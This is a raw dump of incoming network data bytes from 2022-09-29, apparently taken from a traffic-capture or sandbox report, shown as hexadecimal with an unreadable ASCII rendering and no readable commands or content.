                                                                                                                                                    2022-09-29 12:59:14 UTC19495INData Raw: 96 3a b9 6b e0 9f 16 16 4f 46 03 c2 22 a4 cf c7 0d 0c b2 4a 7e 82 e9 86 d3 c0 6a 47 9f 0a 74 bb b5 49 f9 19 17 5d 12 b4 4f d5 51 94 5c b1 29 17 d8 88 95 22 79 e0 7b 67 96 50 1f 41 17 73 4d 5f 83 bd 84 21 4a 7f 71 b6 f6 e3 49 0b ef bc 4f c7 22 0b 4a 94 33 59 18 e8 4f df f3 0a ac 4a 3d da 0f e1 ab b8 c5 d5 9a 62 dd 45 84 17 e2 47 9e 31 3f 03 69 6c 24 4a 54 1e 51 aa 24 41 b1 7c 45 fc cf b6 79 ce 58 6b 7f 38 5b 3a ce a8 81 5c 1a 18 ed 06 99 bf 67 f8 82 42 7c 07 8e 49 4b 69 30 02 fd a8 3a 38 7c ef 1d 06 1a b7 40 e3 2a 71 cd 7a c7 7e 8b bf 6c ab b4 e2 32 0f 65 15 9c ed 73 d4 c2 01 1a 18 db da f1 b4 e8 75 a4 41 68 0f bb 5e 7e ff e9 36 63 49 5d 2e 60 66 34 fc de 4e 30 ad b1 71 6f d2 f1 0c d6 fe e2 2c dd 21 56 a0 c6 ac 06 59 4d f3 40 cd b8 9b 38 bb 6c 8b 88 5c 07
                                                                                                                                                    Data Ascii: :kOF"J~jGtI]OQ\)"y{gPAsM_!JqIO"J3YOJ=bEG1?il$JTQ$A|EyXk8[:\gB|IKi0:8|@*qz~l2esuAh^~6cI].`f4N0qo,!VYM@8l\
                                                                                                                                                    2022-09-29 12:59:14 UTC19511INData Raw: 77 25 49 35 77 2c 50 21 84 6c cc 49 82 79 ce c3 97 4d fd ad 6b c6 f1 55 34 ec b5 c9 19 c5 f9 14 30 c9 4b de 64 54 6f 61 5c b0 77 64 99 1e 67 8a 98 05 f9 69 26 24 ea 43 cc f6 d5 25 6f 36 cc 81 b0 0c 38 bf e1 75 59 3c 04 c5 08 62 d3 82 56 cc 1a 43 bc 65 27 37 9a 49 34 1a e9 30 ef 02 a0 df 9b 35 a3 d9 bd 91 0a 83 74 3c 96 0e 86 d5 f3 64 75 22 ea 33 d9 38 cd 56 4d ed d5 03 d8 8e ef 12 4e 27 c8 e3 0e 7d 64 9e 4c 8b 2c 8e 96 74 f7 a4 70 7d 97 34 66 7c 02 f0 a0 f5 a8 0a 39 d5 90 bc 81 f3 1d 5f 3d 05 c4 b5 a2 a3 52 63 19 d6 66 cb 13 af 73 21 d3 aa a5 f7 9b 51 77 12 d5 ff 7f d7 c1 d3 55 39 ed ae b4 d8 d1 2f 9d 8b d9 e4 4b 34 aa a5 70 96 9a 2e 4b b1 71 e5 7a a4 37 c7 22 f8 7f 7e 0d 9c 02 56 87 90 1f e2 0f aa aa 90 1d d4 c5 3a 27 37 13 15 19 7e fe 74 af 30 99 0c 73
                                                                                                                                                    Data Ascii: w%I5w,P!lIyMkU40KdToa\wdgi&$C%o68uY<bVCe'7I405t<du"38VMN'}dL,tp}4f|9_=Rcfs!QwU9/K4p.Kqz7"~V:'7~t0s
                                                                                                                                                    2022-09-29 12:59:14 UTC19527INData Raw: 8d d0 29 7e a2 76 56 93 13 1e ad ca e0 b4 41 f9 fb 84 59 d1 d6 59 5e 76 0e 0d b2 8f 9a ef 70 6f 98 0f fe 41 fb 9b 93 f1 61 d1 69 d2 81 0e de 54 94 28 d2 59 7f 89 57 6b 9f 7b ec 17 56 e4 1c a4 91 58 72 09 a0 69 9e b8 76 84 8d ca 67 bd 23 73 20 c0 c4 8c a9 a8 7f 72 9c 8c 46 7b 64 2d bc cd d1 07 e5 a7 54 d9 cb 66 60 d6 b4 54 b4 42 5a bc 84 3f 11 5d d9 60 f7 75 7b e2 d7 22 8f c8 aa 6a f2 b0 54 25 8b a8 ad d6 37 28 05 4e 13 f4 94 bf 20 36 86 e1 bb 69 4a e0 77 58 a4 90 fb de 7f 7f 75 b7 9e 2e 85 46 95 92 27 a0 83 61 2b 75 79 3a 1e 44 d7 8f 1b 82 77 c8 55 e1 cd c8 ad 35 5d 3c 0f 84 3e 0a 97 8c d2 98 a2 6b 9e fa c1 c2 8b 8a 27 1f 34 fd 33 88 f3 12 38 bf e9 35 5c 08 ce 0a 07 a9 18 28 1c 84 3c 52 39 22 62 be 20 60 4e ef 7e 94 0e 3e 5e db 98 60 27 80 c3 e8 b6 f4 8d
                                                                                                                                                    Data Ascii: )~vVAYY^vpoAaiT(YWk{VXrivg#s rF{d-Tf`TBZ?]`u{"jT%7(N 6iJwXu.F'a+uy:DwU5]<>k'4385\(<R9"b `N~>^`'
                                                                                                                                                    2022-09-29 12:59:14 UTC19543INData Raw: 8f 02 1d 8b 37 bd 26 1b 96 47 88 64 bc 4e cf 6d 38 a9 07 56 b6 e6 74 a3 64 0a f7 2b 6e 82 7c d3 f2 fe 67 b8 a3 ff 70 54 f9 ee 19 dd 61 1d 16 89 c8 f6 32 49 c8 ef 4e 9c 32 0d 0a 1d 79 0f 75 08 11 76 cf aa 74 5b 0f 3e ac c2 25 84 ef f7 ea dd 7e 63 34 b9 fa 67 50 c9 36 aa 14 25 2e 90 5c 21 c6 17 d8 5c 95 f4 99 7e 25 05 7f ca 05 be 50 16 a6 46 85 15 b8 81 99 fb 04 89 1d e3 6b 34 e2 9a 54 14 89 25 c2 5b 1b ec 08 3b 83 bf ea 2c 0d 5d b7 5a a1 d2 2d 70 f8 92 b4 5a 40 b9 f9 76 d4 be f5 83 87 8d 05 69 39 e4 34 37 66 65 de 8a 25 94 dc f0 ed 3a ff 3f 56 71 e8 80 25 57 b5 63 80 39 5f 18 68 29 3b 4f fc c3 71 f8 6b 0b 51 0a f6 7d 2d 3d 16 f9 b4 11 bd 2e 9c 4e 16 25 b1 35 db 96 6d 68 6b 07 50 ab 79 9c e8 e0 e7 42 dc c8 e8 43 63 b7 21 e7 ea 93 de d6 21 f1 d5 d1 8b ec 6c
                                                                                                                                                    Data Ascii: 7&GdNm8Vtd+n|gpTa2IN2yuvt[>%~c4gP6%.\!\~%PFk4T%[;,]Z-pZ@vi947fe%:?Vq%Wc9_h);OqkQ}-=.N%5mhkPyBCc!!l
                                                                                                                                                    2022-09-29 12:59:14 UTC19559INData Raw: 21 1c 27 e4 57 3d 28 91 96 16 ba 9a ee 48 6a 5c bf 75 8b ff 1c f3 48 c9 9c 73 0d 44 3d c0 54 9d 68 5c b4 d4 93 50 b3 a7 5b 8f 73 2a 7b 54 eb 67 af b8 a7 3c 7f 43 ab 57 6e c3 70 dc d1 90 e0 6e a6 c0 f6 80 2c 19 ca b8 c8 19 ba cf 7b 42 b8 12 45 db 99 9b 2e 26 8c b3 26 11 95 be 68 1c 14 84 43 32 ae 4e 3b 86 a1 3a a8 6f 8e 1f fd 19 20 df 39 23 af 60 dd e8 64 2a c8 2f 01 66 7b d5 cf b8 59 9f 7c 58 9d af 93 89 6c 13 8e 51 61 90 11 37 09 ae d1 92 29 41 41 16 1e 5a cb 78 f1 3e b3 67 d8 7f 84 2e 3f 55 16 a0 53 52 e3 e6 0b 45 9b f0 bb e9 1f d5 d6 f0 b1 0c 03 a1 79 c4 e1 2d 4e 6b a9 e5 7f 58 76 e4 ad 55 7a e7 cf 2f 65 41 4a 7d 24 b6 18 94 ff 63 fd 45 58 2d 16 b5 05 04 5b ee 06 4b 5d ae fd 52 f0 80 db 28 a9 e4 1f 0c 0b 34 e2 68 d9 63 b9 b2 d6 25 90 6c 27 e0 be a1 1d
                                                                                                                                                    Data Ascii: !'W=(Hj\uHsD=Th\P[s*{Tg<CWnpn,{BE.&&hC2N;:o 9#`d*/f{Y|XlQa7)AAZx>g.?USREy-NkXvUz/eAJ}$cEX-[K]R(4hc%l'
                                                                                                                                                    2022-09-29 12:59:14 UTC19575INData Raw: 35 cd 42 3b 91 dc 73 7e 62 e7 7b b4 6c b2 ee 24 f0 6d 24 5b 46 2a e0 9b c5 e6 b4 e2 90 1d af 1a ec 80 10 df a4 95 fe ee 8b 21 da f6 26 65 26 04 a0 06 e2 3c d8 42 29 b0 ff 94 89 0a 94 97 a2 d8 80 a2 39 c0 8e 85 30 3d 2f 23 38 70 c3 8c 65 35 79 48 e6 ae c7 2e 64 fd 66 99 5f e6 42 96 30 87 f4 4e 67 9d 71 52 27 35 e8 64 90 9d 86 eb 7a 37 62 1f f4 71 b2 8b 1f ee 6e 00 35 d3 86 ec 9a 6f 7b a4 8d cb 48 77 85 6c b0 d4 c4 65 55 91 b0 04 90 9d 84 5f 00 a2 b1 7f f9 eb 18 cd 04 0f fb cc b8 0e 80 d8 5e 65 22 6f 50 c0 f9 f4 9a 3e ea 00 21 f4 40 52 bb 55 e8 01 da 88 0d 7e 85 88 72 60 f7 d0 3f ee 89 04 6e 0b 25 ef 34 f3 e3 2f 65 69 7b 6b 16 9f 0c a7 e0 52 dd 6a 43 58 63 94 49 26 39 2b 8f 1e 91 0e 96 a7 f0 09 bf c7 c2 11 f9 22 6a cd d5 4d 04 08 dc f7 f5 06 b2 e0 64 5b e7
                                                                                                                                                    Data Ascii: 5B;s~b{l$m$[F*!&e&<B)90=/#8pe5yH.df_B0NgqR'5dz7bqn5o{HwleU_^e"oP>!@RU~r`?n%4/ei{kRjCXcI&9+"jMd[
                                                                                                                                                    2022-09-29 12:59:14 UTC19591INData Raw: 50 0a bc 99 74 97 94 37 35 82 e1 54 2f 2d 30 33 d0 b6 2f a2 7d 53 48 74 2f 0e 8c 20 98 26 c0 6c b8 0c 45 da d2 c3 4a fd ae 75 cd a4 dc c6 2e 82 7f 28 0e 7e 23 9c 0a 02 dd 5b 7e 71 39 fa dc 0b a0 85 11 9c 01 03 61 8e 93 aa 2c 86 67 66 3c 7c 54 43 a8 64 93 72 9a bc 1c 08 3c 4d 4f 0c 33 f9 c5 27 08 27 82 68 73 46 ae 2e bf c8 e0 b5 bb 8d e6 bf 99 3e 15 5c 75 46 12 c1 bf 9a 80 e1 90 01 76 ab 95 68 38 1f 1b d8 c9 01 22 84 e6 fb 59 e6 99 63 60 d9 c8 be 09 10 2f 27 a0 71 4f 95 e8 87 1c 21 75 e7 c6 8e 9c 01 71 bc d7 77 c8 d7 6f 68 b7 b5 bd bf 6a e5 c7 25 1b 04 4e 80 b6 e5 72 53 74 33 fa 73 3e 88 4b be 2e b7 55 56 f3 1f 6b a3 97 b4 81 12 79 d3 96 9f f4 9a 58 56 b6 15 3a eb d9 f0 a8 25 b7 71 4b cf df a3 2d 03 e2 34 a4 41 9a 2b 20 54 b5 cd 82 31 e0 af 1d 4f be 12 71
                                                                                                                                                    Data Ascii: Pt75T/-03/}SHt/ &lEJu.(~#[~q9a,gf<|TCdr<MO3''hsF.>\uFvh8"Yc`/'qO!uqwohj%NrSt3s>K.UVkyXV:%qK-4A+ T1Oq
                                                                                                                                                    2022-09-29 12:59:14 UTC19607INData Raw: f2 4c ae d7 ad 1c a8 60 bf 80 aa b8 fa de f8 4f 10 81 c5 d5 c6 95 e5 53 4b db 20 58 a9 14 71 15 7b 31 5b ca 45 e5 9c 3e 6e 1b 08 96 cd ff 1c 25 42 cd b3 07 51 89 ff 00 27 1a 9e 44 45 a0 57 69 8d 27 51 e9 d9 b4 34 c2 05 51 2b db 84 99 ec e3 e8 10 d0 9a ad d1 4d b5 70 99 91 da 08 bd 5e ec fc 86 56 e9 0a b5 d3 dc e5 a0 7d 00 81 8c a3 76 53 06 d0 9c 9e 7d 62 dd b8 b1 0a 69 1b ea a9 e0 cc 11 08 25 55 0b 0a 81 78 20 0d 28 83 0a f9 57 0a f5 c8 86 da 59 01 f5 65 d6 32 84 d6 e9 70 13 0e b0 0c 3e bb 91 bd 0f 3c 30 2a ef ed 13 ff bd 72 a4 99 b6 5c cf cb f2 cb ce 9a 61 81 57 cf 0c 4e 67 94 d6 e9 e6 9a 22 76 c7 43 7e 4d 5b 8a 12 17 42 87 e1 7b cc cc b8 c2 fc d6 cb a0 64 d5 0a 48 aa 06 a7 86 00 7b 5a 41 db 47 76 88 4a 3e ff 2a 9a 83 95 db f1 a6 c2 e6 b2 b1 4a 3c f1 49
                                                                                                                                                    Data Ascii: L`OSK Xq{1[E>n%BQ'DEWi'Q4Q+Mp^V}vS}bi%Ux (WYe2p><0*r\aWNg"vC~M[B{dH{ZAGvJ>*J<I
                                                                                                                                                    2022-09-29 12:59:14 UTC19623INData Raw: 3d 5f 47 24 16 ae 51 8d b9 4d ab 78 02 ff e8 3f 63 53 f0 e7 29 47 58 3a a5 c1 bc e5 35 4c 51 43 27 df 58 56 b2 27 49 ea d4 c3 50 8c 63 7a 55 61 75 50 6f 70 78 56 13 fb 7d de 38 d1 dd 2a 21 0b 66 9a 13 b9 81 b2 9d f4 93 ae 21 35 e0 ac a7 34 3a ad c6 83 32 e6 03 d8 49 cd e5 ef c6 d0 bb 7c ec 7d fb 70 2c 7f a8 bd 45 82 a4 dd bc 79 48 ed 12 1e 8d 93 df 3b cb 56 55 84 cf 36 5c fe a2 5c c9 b2 7a 3b 1d 2c f5 82 0a 99 d3 09 9d 04 97 43 8a cd 1c c5 d3 66 a8 27 62 f6 b9 3f a7 d3 5f e0 5c c6 aa c2 d6 dd 40 12 1f 9a 7f 29 f6 ec a1 98 52 a4 78 a1 84 37 24 6d 47 2c 59 ef 48 e6 24 f3 97 a0 34 60 b4 47 da 1b 1b 34 46 b6 1c 99 03 76 5f 8e 0e f6 ac 0a c6 87 ea 4c 67 a2 40 99 b7 2d 7d c8 15 8f 60 53 c9 de ac 1c 29 3a 05 71 e4 4f 97 d4 7e 37 45 b5 1d 19 41 ca fd ea eb 7a 63
                                                                                                                                                    Data Ascii: =_G$QMx?cS)GX:5LQC'XV'IPczUauPopxV}8*!f!54:2I|}p,EyH;VU6\\z;,Cf'b?_\@)Rx7$mG,YH$4`G4Fv_Lg@-}`S):qO~7EAzc
                                                                                                                                                    2022-09-29 12:59:14 UTC19639INData Raw: aa c9 33 e9 0e c7 33 38 35 c1 c0 5a 49 fa 63 4d 13 38 0e 38 55 3f a5 da 50 92 1d 6e 97 d4 85 22 dd f1 26 94 d0 9c 08 69 c9 b8 cd 5b d4 9b 33 bf 14 b3 7f 93 44 7f a7 4e ea 84 52 e0 e6 72 e5 20 30 22 16 ac 95 25 6e 00 11 dd 70 f5 73 e7 67 b7 06 3d c7 29 09 20 bf f4 02 ea c6 15 95 28 a2 70 70 10 c8 a6 46 19 e7 53 26 b6 ec a1 60 bd 7e df ac 1c 9f df 63 60 ce 62 34 99 f0 f8 1e f6 b9 58 96 a4 6f 94 2a 59 8f ba 18 4d 32 09 57 82 e7 97 75 a6 56 fa d7 82 39 bb dd 11 4d 7c c8 37 b3 f0 16 ab 1b 8c 7e a5 88 f3 d9 90 6d 7a 15 d2 5e d5 d3 3e 28 be b6 dd 66 4e 46 9e eb e5 1e 7c 59 3d cd 54 62 25 d1 9f bf a7 f6 4c f2 1f 6f 7f 29 1c 5c fc 75 01 6f 16 46 05 0e 9f d5 3b a8 80 db 96 44 5a fa 4f 3e eb 92 43 2e ab ab f3 52 6b 08 23 75 40 84 6e 3d f4 a0 64 63 0a 09 a2 ec d1 32
                                                                                                                                                    Data Ascii: 3385ZIcM88U?Pn"&i[3DNRr 0"%npsg=) (ppFS&`~c`b4Xo*YM2WuV9M|7~mz^>(fNF|Y=Tb%Lo)\uoF;DZO>C.Rk#u@n=dc2
                                                                                                                                                    2022-09-29 12:59:14 UTC19655INData Raw: 43 d3 4a a8 15 7b 90 d3 48 24 4c b9 ba b2 ec 9f 8b 00 ba 59 87 7e 8f a1 da f7 23 92 43 34 6e ec 46 e0 fc a5 4d 75 56 4d 54 a3 c0 96 69 16 8e b1 28 f4 90 3e 30 65 f3 aa cc 2f f3 96 85 5b 55 c5 7e a8 e5 ec 85 5e 9a cc 5d 45 25 f5 f6 72 d6 13 7c af a7 68 19 e6 a2 36 d9 fc 9c e3 e7 2f 1a 7b 9b 58 c9 23 75 36 20 e4 ad 69 3e 79 01 33 b2 00 dc 01 96 69 45 ae 3d f3 d7 ac bb 67 29 13 57 42 2b d5 e5 c6 8d 11 7d b7 1e 96 5c cc 6e ff a1 8d a2 34 78 0e 0e 66 5a 3b fd 0c 1a d9 96 d9 eb 3d 98 90 7f 2e 8e 17 ab 00 c6 4d 2f de 78 f7 9e 07 1c 29 6c 76 57 94 2c 43 60 6e 7e 38 1e 6f 6d 93 42 d2 6f 2a d5 df 70 56 bc 5e 64 60 5b aa d5 be 8b 27 65 43 65 f5 cb d1 47 5f 94 8b 21 6b 53 cd 72 c7 bf 4d 62 01 ae 1f 5f fa f8 b2 cf 6b 0c 86 14 33 bc 55 48 89 a5 64 bf 98 9d e0 89 3d 96
                                                                                                                                                    Data Ascii: CJ{H$LY~#C4nFMuVMTi(>0e/[U~^]E%r|h6/{X#u6 i>y3iE=g)WB+}\n4xfZ;=.M/x)lvW,C`n~8omBo*pV^d`['eCeG_!kSrMb_k3UHd=
                                                                                                                                                    2022-09-29 12:59:14 UTC19671INData Raw: 5d e1 57 88 0b de c1 9b da 77 2e 18 b4 40 37 cf 82 76 16 3d 90 ab 4c 1d a6 68 7c 28 5d e5 f7 c7 8f 29 0d 4c d2 a8 ce ff 84 57 d9 c3 91 a2 9d 4c d6 7c ac 5a b7 ff 28 c1 c5 51 8c 68 6f ea a4 ac 77 67 94 ad 72 d1 0c 3d ff d0 84 d4 9e 57 88 2e 18 ba 56 11 47 22 09 94 39 26 3a f2 1d b4 c5 b8 d2 97 a7 64 9d 1a 93 f6 58 c4 c8 dc 59 c3 15 1f 18 b2 4c 00 27 d5 3f 07 fd 40 3c 3a f7 c9 19 c4 d7 5c 83 b4 ad 70 3c ec e9 be 16 4e 91 4c ca d0 4e d8 7d dc 5a 21 d2 08 5c 95 24 aa c5 cd af 99 4b 5e 65 52 7f c7 3f dd b9 51 6a 72 20 bd 95 d0 82 df 26 45 93 09 74 7f 53 24 3c 23 80 04 91 df 70 ea be 91 a5 6a 5c 26 fb 73 30 dd fe 71 b2 30 c2 4b eb 88 4a ba a8 37 48 5c 27 d1 7b d7 08 9a 2b 23 91 27 59 ea 09 dc 4e 52 e3 f1 33 67 12 c4 ad 0f ce 02 f4 4a 8d 70 28 b3 0b 8c c3 11 b5
                                                                                                                                                    Data Ascii: ]Ww.@7v=Lh|(])LWL|Z(Qhowgr=W.VG"9&:dXYL'?@<:\p<NLN}Z!\$K^eR?Qjr &EtS$<#pj\&s0q0KJ7H\'{+#'YNR3gJp(
                                                                                                                                                    2022-09-29 12:59:14 UTC19687INData Raw: 92 af 46 1c 60 9b 3c 17 8a 1d 39 32 b0 09 ae 36 50 57 91 1d 55 ce 9c 91 78 44 31 37 10 53 75 d9 a6 79 bc 71 af f8 b7 a2 cf fa b0 47 6e 9c 54 35 a8 46 9e 7b 50 38 8e de f1 e3 9f 4d 87 1c 2d e5 90 55 0d 29 a5 b8 80 fb bc 55 5a e3 d6 fe c8 95 7e 9e 78 a5 fa a7 7d bf 4a 7a 42 0f 9f f7 31 eb 8a a8 e8 80 4a 95 92 8c 5b b5 c9 e1 46 89 3a 2e 8c b2 69 98 82 b3 2f f7 f9 c9 fe 72 2f 78 9b f8 a9 7e bc aa ce 7c 04 ca 95 6b e2 0d 00 15 9e da 5b fd c8 93 61 11 e8 e2 d1 2f 9d 36 d4 57 8e 26 c1 a9 6d 91 03 db e6 8f e9 9a b0 08 6c ff 9a ba 75 21 ca 82 b1 29 ac 2e c4 4a 0c 0e 3e 04 22 1c a5 5b dc 22 31 b7 f7 8c 51 17 26 ba f1 76 e7 42 d0 ff 3e cc 7b 62 f2 80 36 4c a7 ad 73 ca de 86 b9 45 e9 90 b3 40 aa 23 19 13 fe 47 05 c0 b1 9d d3 1d 37 c9 8d 05 d3 eb c1 a6 3e b0 36 d3 8e
                                                                                                                                                    Data Ascii: F`<926PWUxD17SuyqGnT5F{P8M-U)UZ~x}JzB1J[F:.i/r/x~|k[a/6W&mlu!).J>"["1Q&vB>{b6LsE@#G7>6
                                                                                                                                                    2022-09-29 12:59:14 UTC19703INData Raw: 1b 27 12 55 2d 6b f2 d1 95 f2 46 fd a5 63 69 d7 dd 76 da 5a 50 95 f0 44 64 97 8f 10 d8 e1 4b ce 28 1c 34 ca dc 4a 7e 1e 9c 7d c7 fc b7 2e ec 96 8c a9 b2 c6 00 3d 46 a4 de 6a 57 51 26 50 a4 a2 42 88 e0 50 95 d2 0b 1f be eb d9 e4 a7 1e 13 d3 74 fc 4e d8 03 a5 d4 58 5e 2d ec 59 82 b2 51 a7 c1 f1 9e 91 20 f4 d1 8a 04 d1 ee 1e 98 a8 f3 75 3e 09 7e 0b 2a 0d 1b 1b b9 34 fb 19 ac 87 52 81 35 b7 1d 8e c2 b0 f1 26 85 87 49 b0 7c 91 e4 0c 6c 5a bb 5e 10 d1 24 8c e4 16 fd eb 7b c5 63 e8 87 f0 31 d8 58 e1 13 9b 27 c6 15 0d ed c5 75 b8 09 86 21 11 32 c3 65 4b 93 ca 85 ee 65 5a 80 07 c9 49 09 0c e0 5d 9d 3c 14 0f 45 21 7c c3 6e 41 85 6b 15 19 ed 90 b7 64 72 b3 da f4 2a 27 52 8b 57 fd bc a5 1b ca 35 c5 78 41 9a 54 9f 22 16 9c 24 82 d0 30 1b 2d 9b d3 cf a8 bb 70 6c 20 98
                                                                                                                                                    Data Ascii: 'U-kFcivZPDdK(4J~}.=FjWQ&PBPtNX^-YQ u>~*4R5&I|lZ^${c1X'u!2eKeZI]<E!|nAkdr*'RW5xAT"$0-pl
                                                                                                                                                    2022-09-29 12:59:14 UTC19719INData Raw: 5a 35 52 77 df 22 05 0c b7 22 af 65 be 59 9c c3 8b 45 66 06 d2 31 11 d5 23 84 01 ae 04 8e d8 be 92 ed 8a 98 41 9f ee 5f b8 7c fd 2b d1 42 c9 06 19 2d d5 2f d0 01 24 a1 24 00 99 e8 15 78 71 94 a5 fc 14 81 ef 74 8d fa 16 9c 77 a0 b9 41 b6 82 83 cb 48 d7 dd 87 59 b0 08 c7 6a 05 d0 6e ab 39 f6 7d 36 e0 4a 26 42 4e ab d4 82 4d d0 b2 8c b4 a8 9b fd a4 e1 5a 5e f9 45 44 23 b2 87 d0 f0 94 04 89 cc 15 a7 1a 6f 5c 49 f6 9d 72 79 e9 04 b3 11 a8 3d 1b 0e 1d cb 59 09 7e b8 ed 8c f1 24 c7 66 6f 3e 6a 62 61 d9 bc 94 41 c8 ce 6e dc f1 c8 3e 44 2f fa ec 5f c4 48 59 15 a6 9a 28 ce 2c 8d cb a3 15 c7 0a 74 90 6c 87 5e a2 df 1c ed ea 98 0e e8 83 c6 2f 23 1e a5 f8 41 45 b3 0a 46 2c bc 24 a1 8e 28 ba e8 74 51 56 c3 cc 96 f2 d5 1b c4 84 44 81 7f 45 08 be 69 83 cf 35 85 9f 47 cd
                                                                                                                                                    Data Ascii: Z5Rw""eYEf1#A_|+B-/$$xqtwAHYjn9}6J&BNMZ^ED#o\Iry=Y~$fo>jbaAn>D/_HY(,tl^/#AEF,$(tQVDEi5G
                                                                                                                                                    2022-09-29 12:59:14 UTC19735INData Raw: 28 4e e2 fc da 1c 7e bc 4e 5e eb fa fa 9f b9 8d d3 6e a8 b4 fe 2a eb ec ba d8 71 b3 f5 76 4e 08 ef 84 bf 45 57 1f b5 c3 61 6f ee 37 4e 39 92 3f f8 6b 97 e1 99 22 c2 f3 47 85 8f e5 38 6f 26 51 29 49 ac 46 53 89 c1 96 57 6d fb 50 e4 38 3a 52 a1 38 da 6a e5 a0 fd 68 e8 78 6c 1e e4 f3 08 b1 f1 8a bc 86 f9 34 92 b7 00 aa c5 da 7b 35 23 56 f2 c9 49 bf de 06 f4 f1 2d 81 00 a4 a0 7a 22 3c 76 e9 23 07 3e 04 80 54 c0 16 de 9f ab 89 ff a2 9f ba fe da 7f 58 17 4e 9f e8 3f 7b 08 7f 0e a8 be c8 1d d5 9b 8e bb 07 40 0c 5c 26 25 cc 36 4f b6 08 81 df eb 64 f7 03 59 3c 6d ad bc 51 33 88 12 54 85 15 aa ef e7 72 c2 e7 0c 07 01 bd 2d 62 f4 6b 83 93 9b c6 fe 92 b7 20 34 c3 20 48 35 8e 70 65 71 67 a2 41 c5 d0 86 27 bf fa 57 06 07 35 52 56 0c c0 60 27 6b b8 56 8f d6 44 e3 6f 10
                                                                                                                                                    Data Ascii: (N~N^n*qvNEWao7N9?k"G8o&Q)IFSWmP8:R8jhxl4{5#VI-z"<v#>TXN?{@\&%6OdY<mQ3Tr-bk 4 H5peqgA'W5RV`'kVDo
                                                                                                                                                    2022-09-29 12:59:14 UTC19751INData Raw: f0 77 f7 93 97 3c 55 a3 0c a1 6e 22 f1 29 77 5e 62 07 03 0e 7f e6 92 e0 2d 0c 93 d5 bb 5a 42 8c da 25 f1 23 bd c4 4e 8f d3 13 64 aa 91 26 21 15 72 41 8b 2d 8f f6 31 b7 30 f5 47 00 aa 05 98 88 08 78 95 5a 83 6f 33 88 b7 6b 1f 5e 7f b2 84 fc 31 7b 5b e1 bc f6 a1 10 89 d0 37 c1 a3 14 68 65 b6 7f 58 20 52 75 13 f7 b7 5d 1b da c4 a9 79 cc 69 f5 9a 4e 86 5b 72 be 6a 55 9c be ca c8 a9 94 23 64 9a fc a9 5a ce 56 25 da 08 44 aa 7a 29 ca 15 d5 04 6d 03 6f 4b d9 4f a6 44 98 7a 0f 7d e4 f2 97 a2 6e a7 a8 fc ad 55 29 4e 35 ce 02 e0 97 a4 5a bd c4 ea 3f 49 61 71 b8 aa ea 84 ab f4 e7 ab b2 7c af fd c6 8a 1f e5 7a 60 57 30 e6 bc 5d 2a cb 3d cd ae 66 19 4f f5 64 16 36 fc 5b 62 0a 6e 55 bf 0a 22 3f 3a 98 21 55 76 cf 96 2f a0 d6 83 f0 f9 88 b6 6f 8e 8c 8d 3c 95 86 81 29 52
                                                                                                                                                    Data Ascii: w<Un")w^b-ZB%#Nd&!rA-10GxZo3k^1{[7heX Ru]yiN[rjU#dZV%Dz)moKODz}nU)N5Z?Iaq|z`W0]*=fOd6[bnU"?:!Uv/o<)R
                                                                                                                                                    2022-09-29 12:59:14 UTC19767INData Raw: 4f 80 bc 21 fd 88 0c 80 99 3f ad 22 d7 10 22 de 5e 22 a6 20 d1 43 11 45 e1 78 85 21 b2 f8 d2 3c 59 84 d4 ef 79 bf da 4d d9 eb cd e0 92 35 4c 3b 07 8a f8 f0 d8 48 d0 a9 a1 76 dd ec e8 4e 24 de 1e 71 16 b2 bb 8c 31 f5 ad 67 04 55 35 5a 5b b2 bd 2d 63 46 c7 ae 78 04 27 58 f0 83 33 77 81 c3 90 ba 34 b4 a1 59 d5 c7 d4 ba 30 c3 e4 91 86 7e b8 60 05 be 20 4c 14 e4 b0 c6 3d 48 25 1d 29 25 51 1f 98 15 43 f1 74 cc a9 da 21 56 b5 7f 9d c3 50 72 26 b4 c4 e1 1b 22 4a 8b ea 4e d6 32 01 dc 5f 5a f3 6b 01 2c 8c a5 f1 9c 47 e3 f4 71 31 40 f1 3a 12 c5 7f 37 5b 60 69 0a d9 d9 d4 4f 08 17 7e 63 50 5f 63 84 52 19 17 d7 7c 3d 30 b4 d5 e0 02 be f6 cd 04 26 61 a7 6d 74 86 a9 98 2c b0 e5 e1 2f 46 55 ec 64 17 da 7e 99 9b 24 d2 a0 bb c8 83 c4 70 6b 3a 07 f3 a1 a5 f7 bd 81 7b d2 c6
                                                                                                                                                    Data Ascii: O!?""^" CEx!<YyM5L;HvN$q1gU5Z[-cFx'X3w4Y0~` L=H%)%QCt!VPr&"JN2_Zk,Gq1@:7[`iO~cP_cR|=0&amt,/FUd~$pk:{
                                                                                                                                                    2022-09-29 12:59:14 UTC19783INData Raw: 57 29 a2 90 d7 26 97 95 cb bd 94 51 ed 4e 8b 5f 55 98 5e 29 31 30 5c 58 8e 56 50 1e 71 4e a0 6d 80 b7 c4 0b 8e b1 2d 4e 29 2a 2e cc 3f 9a 3c 9d 97 b9 95 84 41 a0 9e 5c 53 93 fa fa de 43 a4 45 a1 09 bc d6 c3 c1 41 a0 57 1d c8 1a 06 a8 23 cc 47 20 70 41 80 50 18 e8 d6 22 fa 2e 70 4e 03 44 8d c6 e7 6e 24 b6 3d a1 27 0b 22 26 55 08 5d 6d c3 bd d0 72 2c f6 b2 76 35 77 23 03 67 b9 8e 7b 87 f1 50 76 ba 75 0e ac ab 47 f9 be 17 ac 80 6e 03 2a d6 53 21 a7 d1 68 d1 df 57 fb 9b 6c 4d ab 43 2c be 61 be fb 22 c0 a1 bb fd 00 02 c3 6a 24 96 0f de 17 e4 d1 96 92 7d 8f 27 69 95 cd fd 40 9f 27 4d e7 26 88 41 6c 2f 50 99 da 91 37 df 6b 27 c8 ee 56 cc be b6 40 7e c9 15 a9 65 21 3a 5c 7d ed e4 74 ca c9 f1 70 f0 d6 ea c8 1c 79 72 9c 48 99 69 43 a0 17 4d 15 82 74 40 f6 25 1b d8
                                                                                                                                                    Data Ascii: W)&QN_U^)10\XVPqNm-N)*.?<A\SCEAW#G pAP".pNDn$='"&U]mr,v5w#g{PvuGn*S!hWlMC,a"j$}'i@'M&Al/P7k'V@~e!:\}tpyrHiCMt@%
